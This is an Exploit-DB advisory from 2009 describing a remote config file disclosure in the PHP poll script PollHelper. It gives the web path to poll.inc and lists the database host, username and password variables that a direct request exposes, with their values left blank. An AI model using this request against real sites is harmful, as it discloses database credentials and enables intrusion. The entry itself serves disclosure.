PollHelper poll.inc Remote Config File Disclosure Vulnerability

2009-01-06T00:00:00
ID EDB-ID:7690
Type exploitdb
Reporter ahmadbady
Modified 2009-01-06T00:00:00

Description

PollHelper (poll.inc) Remote Config File Disclosure Vulnerability. CVE-2009-0827. Webapps exploit for php platform

                                        
                                              Remote Config File Disclosure
----------------------------------------------------
script: PollHelper
   
***************************************************************************
download from:http://www.freedville.com/oss/PollHelper.zip
   
***************************************************************************
vul:

www.site.com/path/poll.inc
...............................
  $dbhost = "";
  $dbusername = "";
  $dbuserpass = "";
  $default_dbname = ";
..............................
-------------------------------------------------
-------------------------------------------------  
*************************************************

Author: ahmadbady 

*************************************************

# milw0rm.com [2009-01-06]